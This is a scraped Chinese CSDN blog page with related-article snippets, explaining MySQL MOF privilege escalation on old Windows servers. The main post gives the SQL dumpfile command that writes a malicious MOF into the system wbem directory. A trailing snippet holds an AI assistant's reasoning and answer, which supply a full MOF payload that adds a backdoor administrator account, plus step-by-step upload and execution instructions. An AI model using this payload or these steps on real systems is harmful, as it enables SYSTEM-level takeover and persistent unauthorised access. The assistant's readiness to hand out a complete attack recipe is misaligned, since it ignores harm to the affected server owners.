Mysql——mof提权

最新推荐文章于 2023-10-07 16:38:19 发布

想冲大厂的癞蛤蟆

最新推荐文章于 2023-10-07 16:38:19 发布

阅读量2.3k

点赞数 1

CC 4.0 BY-SA版权

分类专栏：漏洞提权文章标签： mysql 安全漏洞

本文链接：https://blog.csdn.net/Zlirving_/article/details/106618559

mof提权

原理

在windows平台下，c:/windows/system32/wbem/mof/nullevt.mof这个文件会每间隔一段时间（很短暂）就会以system权限执行一次，所以，只要我们将想要的操作通过代码存储到这个mof文件中，就可以实现权限提升

利用条件

仅限windows 及适用于windows server2003及以下的版本
mysql用户具有root权限(对上面那个目录可写）
关闭了secure-file-priv

利用方式

拿下webshell之后当前权限仅限于对网站文件的操作，想要获取对主机的操作还需进一步提权

使用sql语句，通过mysql的dumpfile操作将恶意mof文件拷贝到服务器的c:/windows/system32/wbem/mof/目录下，将系统当中默认的nullevt.mof给替换掉，进而让系统执行我们这个恶意的mof文件

select load_file('mof提权文件及路径') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof'

mof提权代码
nullevt.mof

#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter
{

最低0.47元/天解锁文章

新学期VIP享超值加赠

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

想冲大厂的癞蛤蟆

关注关注

1
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

操作系统权限提升(二十七)之数据库提权-MySQL MOF提权

把自己活成一道光，因为你不知道，谁会借着你的光，走出了黑暗。请保持心中的善良，因为你不知道，谁会借着你的善良，走出了绝望。请保持你心中的信仰，因为你不知道，谁会借着你的信仰，走出了迷茫。请相信自己的力量，因为你不知道，谁会因为相信你，开始相信了自己....

09-22

667

mof是windows系统的一个“托管对象格式”文件（位置：C:/windows/system32/wbem/mof/），其作用是每隔五秒就会去监控进程创建和死亡，mof目录下有两个文件夹（good与bad）。Windows server 2003及以下系统每5秒会执行一次mof目录下的文件，执行成功会移动到good文件夹，执行失败则会移动到bad文件夹。注：MOF提权只能用于Windows系统提权，Linux提权无法使用。

权限提权——Win提权漏洞及数据库&AT&SC&PS提权

m0_61506558的博客

10-12

832

最近在上计算机组成原理的时候接触到了数据溢出，之前也接触过一点，对于PWN选手研究的会比较深，通过本篇文章，整理提权的常用方法.当你通过弱口令爆破、敏感文件读取、sql注入等漏洞获取到了管理员的账号和密码登入后台以后，需要提升自己的权限，就得在后台页面中寻找漏洞利用的点，成功上传webshell提升权限.(一）权限提升权限介绍提权可分为纵向提权与横向提权：纵向提权：低权限角色获得高权限角色的权限；横向提权：获取同级别角色的权限。

参与评论您还未登录，请先登录后发表或查看评论

mysql mof提权_MySQL_MOF提权

weixin_32148341的博客

01-27

325

一、原理Windows管理规范(WMI)提供了如下三种方法编译WMI存储库的托管对象格式(MOF)文件：将MOF文件执行为命令行参数及Mofcomp.exe文件使用IMofCompiler接口和$CompileFile方法拖放到 %SystemRoot%\System32\Wbem\MOF 文件夹下的MOF文件中托管对象格式(MOF)文件在 C:\Windows\System32\wbem\MOF...

Mysql-mof提权

告白的博客

08-14

502

0x00 mof提权原理类似于之前的udf提权，参考https://blog.csdn.net/qq_53577336/article/details/119700116 另外一种mysql提权方式叫做mof提权在windows系统下 (在c:/windows/system32/wbem/ mof /nullevt. mof)存在一个mof文件，他的特点是，每个极短一段时间，便会以system权限自动运行文件内脚本，mof提权就是将我们写好的mof文件导入到该目录该文件里门，让他自行执行我们的语句，达到

数据库提权--MOF（MYSQL）

qq_45936617的博客

10-07

883

MOF提权的利用原理是利用目录下的 nullevt.mof 文件，每隔一段时间（默认5s）都会用系统权限执行一次的特性，来写入cmd命令使其被带入以系统权限执行MOF提权的使用条件是：1、secure_file_priv参数不为null2、有修改nullevt.mof 文件的权限3、数据库用户具有root权限MOF提权的步骤是有恶意语句的mof文件写入到mof目录下-->系统每隔一段时间自动执行。

mof提权

qq115399231的博客

07-16

591

原理利用了c:/windows/system32/wbem/mof/目录下的 nullevt.mof 文件，每分钟都会在一个特定的时间去执行一次的特性，来写入我们的cmd命令使其被带入执行。对windwos版本有所要求：仅限windows server2008以下的版本 mof提权代码 #pragma namespace("\\\\.\\root\\subscription") insta...

Mysql数据库提权——MOF提权

cxrpty的博客

03-11

745

mof是windows系统的一个文件（在c:/windows/system32/wbem/mof/nullevt.mof）叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡，应用在win2008以下的系统，Mysql5.7以下(--secure_file_prive:此配置写文件不限制) 实验环境：windows2003 实验步骤：一、搭建环境在windows2003上安装3...

mof提权复现

03-20

### 关于 MOF 提权复现方法及教程 MOF (Management Object Format) 提权是一种针对特定操作系统环境下的漏洞利用技术。以下是基于已有资料整理的 MOF 提权复现方法及相关注意事项。 #### 一、MOF 提权的前提条件 ...

渗透测试——提权方式总结

热门推荐

橘子女侠

06-11

3万+

（内容整理自网络）一、什么是提权提权就是通过各种办法和漏洞，提高自己在服务器中的权限，以便控制全局。 Windows：User >> System Linux：User >> Root 二、怎样进行提权（提权的方式有哪些） 1.、系统漏洞提权（Linux、Windows） 2、数据库提权 3、系统配置错误提权 4、权限继承类提权 5、第三方软件...

mysql之mof提权

Clannad的博客

11-17

561

文章目录靶机 Server 2003use exploit/windows/mysql/mysql_mof查看需要配置的参数配置参数输入 run 或者 exploit 来执行成功拿到meterpreter回显之后，输入shell，拿下shell开启和关闭3389端口靶机 Server 2003 use exploit/windows/mysql/mysql_mof 使用use 来调用此模块记...

mof提权文件nullevt.mof

03-12

mof是windows系统的一个文件（在c:/windows/system32/wbem/mof/nullevt.mof）叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后，然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行，这个mof当中有一段是vbs脚本，这个vbs大多数的是cmd的添加管理员用户的命令。 mof文件通过Mofcomp.exe编译执行。

Mysql提权方法总结系列-MOF提权

kracer的博客

02-27

3451

0x01 简介 mof是windows系统的一个文件（在c:/windows/system32/wbem/mof/nullevt.mof）叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后，然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行，这个mof当中有一段是vbs脚本，这个vbs大多数的是cmd的添加管理员用户的命令。 0x02 条件 mysql有读写 C:/Windows/system32/...

MySQL提权之mof提权

2301_77300311的博客

04-11

750

关于 mof 提权的原理其实很简单，就是利用了 c:/windows/system32/wbem/mof/ 目录下的 nullevt.mof 文件，每分钟都会在一个特定的时间去执行一次的特性，来写入我们的cmd命令使其被带入执行。MOF文件每五秒就会执行，而且是系统权限，我们通过mysql使用load_file 将文件写入/wbme/mof，然后系统每隔五秒就会执行一次我们上传的MOF。我们提权成功后，就算被删号，mof也会在五秒内将原账号重建，那么这给我们退出测试造成了很大的困扰，所以谨慎使用。

Mof提权科普

weixin_30915951的博客

01-23

188

今天再拿一个站的时候遇到了很多问题，拿站的过程就不说了，其中要用到mof提权，不管能不能提下，我进行一个mof提权的科普这里我综合各类mof提权进行了综合首先说一下，无shell情况下的mysql远程mof提权利用方法详解就是你注入拿到了数据库的root账号密码，直接进行扫到一个站的注入在havij中得到mysql数据库中mysql库保存的数据库密码：有...

MOF文件提权

songbai220

11-19

814

MOF文件提权 Windows 管理规范 (WMI) 提供了以下三种方法编译到WMI存储库的托管对象格式 (MOF) 文件：方法 1：运行 MOF 文件指定为命令行参数将 Mofcomp.exe 文件。方法2：使用 IMofCompiler 接口和 $ CompileFile 方法。方法 3：拖放到%SystemRoot%\System32\Wbem\MOF文件夹的 MOF 文件。 Microsoft 建议您到存储库编译 MOF 文件使用前两种方法。也就是运行 Mo...

mysql之mof提权详解

weixin_30376323的博客

01-23

241

原理解读： Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件：方法1：运行MOF文件指定为命令行参数将Mofcomp.exe文件。方法2：使用IMofCompiler接口和$CompileFile方法。方法3：拖放到%SystemRoot%\System32\Wbem\MOF文件夹的...

技术干货：MySQL数据库Root权限MOF方法提权研究

weixin_34174132的博客

11-01

246

2019独角兽企业重金招聘Python工程师标准>>> ...

mysql mof提权_MySQL提权之mof提权

weixin_42498989的博客

01-19

790

mof提权原理关于 mof 提权的原理其实很简单，就是利用了 c:/windows/system32/wbem/mof/ 目录下的 nullevt.mof 文件，每分钟都会在一个特定的时间去执行一次的特性，来写入我们的cmd命令使其被带入执行。下面简单演示下 mof 提权的过程！MOF提权的条件要求十分严苛：1.windows 03及以下版本2.mysql启动身份具有权限去读写c:/windows...

mysql mof_mof提权

weixin_33511821的博客

02-01

358

第一次接触提权，先看了个最简单的，哈哈哈哈，看了几个视频和文章，然后整理了一下，估计很多不对的地方，等真正了解了就回来改掉。原理mof是Windows系统的一个文件，位于c:windowssystem32wbemmofnullevt.mof，叫做托管对象格式，它的作用是每隔5秒，就会去监控进程的创建和死亡。mof提权的简单利用过程就是，拥有了MySQL的root权限后，使用root权限去执行上传操...

mysqlmof提权

最新发布

03-26

<think>嗯，用户想了解如何通过MySQL MOF进行提权操作。我需要先回忆一下相关的知识，然后结合提供的引用内容来组织回答。首先，MOF提权是什么？我记得MOF文件是Windows管理规范的一部分，用于系统管理。当系统处理特定的MOF文件时，可能执行其中的代码。MySQL的MOF提权应该是利用MySQL的写入权限，将恶意MOF文件放到系统目录，触发执行，从而获取系统权限。根据引用内容，步骤大概包括上传MOF脚本到可写目录，然后通过MySQL执行命令将其复制到系统目录。例如，引用[1]提到上传脚本后使用MySQL提权项执行命令。引用[3]中的SQL语句是使用`load_file`和`dumpfile`将文件写入到`wbem/mof`目录，这应该是关键步骤。需要注意的要点是：MySQL需要有写权限到系统目录，尤其是`C:/Windows/System32/wbem/mof/`，这个目录需要存在，并且MySQL服务账户有权限写入。另外，MOF文件的内容需要包含恶意代码，比如添加管理员用户或执行命令。可能的问题包括目录不存在、权限不足、MySQL版本差异等。例如，引用[2]提到MySQL版本不同，UDF提权需要不同的路径，但这里MOF提权可能不需要UDF，不过需要注意目标系统是否允许MOF执行。还要考虑防御措施，比如限制MySQL账户权限，监控系统目录的写入等。用户可能想知道如何防范这种攻击，所以回答中应该包含防御建议。现在需要将这些点整理成步骤，并确保引用正确的来源。同时，根据用户提供的引用，引用[1]、[3]直接涉及MOF提权步骤，而引用[2]是关于UDF提权的，可能不需要在这里详细讨论，但可以作为对比提及。可能还需要解释MOF文件执行机制，为什么写入到那个目录就能提权，以及实际利用中的限制条件，比如需要MySQL的FILE权限，secure_file_priv设置等。最后，生成相关问题，比如如何防御、与其他提权方法的区别、失败原因分析等。</think>### MySQL MOF 提权方法及实现方式 #### 原理说明 MOF（Managed Object Format）是Windows系统管理工具WMI（Windows Management Instrumentation）的脚本文件，默认路径为`C:/Windows/System32/wbem/mof/`。系统会定期编译该目录下的MOF文件并执行其中的代码[^3]。通过MySQL的`SELECT ... INTO DUMPFILE`命令，可将恶意MOF文件写入该目录，触发系统执行提权命令。 --- #### 实现步骤 1. **前提条件** - MySQL需具备`FILE`权限且`secure_file_priv`设置为空或允许写入系统目录[^1]。 - MySQL服务账户（通常为`SYSTEM`或管理员）需有权限写入`C:/Windows/System32/wbem/mof/`。 2. **编写恶意MOF文件** 创建一个`.mof`文件（如`admin.mof`），内容示例为添加管理员用户： ```cpp #pragma namespace("\\\\.\\root\\subscription") instance of __EventFilter as $EventFilter { EventNamespace = "Root\\Cimv2"; Name = "TestFilter"; Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"; QueryLanguage = "WQL"; }; instance of CommandLineEventConsumer as $Consumer { Name = "TestConsumer"; CommandLineTemplate = "net user hacker Password123 /add && net localgroup administrators hacker /add"; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; }; ``` 3. **上传MOF文件** 将`admin.mof`上传到MySQL可读写的目录（如`C:/admin.mof`），需通过Web漏洞或文件上传漏洞实现[^1]。 4. **通过MySQL写入系统目录** 执行以下SQL命令，将文件复制到目标路径： ```sql SELECT LOAD_FILE('C:/admin.mof') INTO DUMPFILE 'C:/Windows/System32/wbem/mof/admin.mof'; ``` 写入成功后，系统会在约1分钟内自动执行MOF文件中的命令。 --- #### 关键限制与风险 1. **路径权限问题** 若MySQL服务账户无权写入`wbem/mof`目录，操作会失败[^1]。 2. **MOF文件覆盖问题** 系统会定期清理MOF日志，若重复写入同名文件可能触发异常[^3]。 3. **防御措施** - 限制MySQL账户的`FILE`权限。 - 设置`secure_file_priv`为受限路径。 - 监控`wbem/mof`目录的文件变化。 ---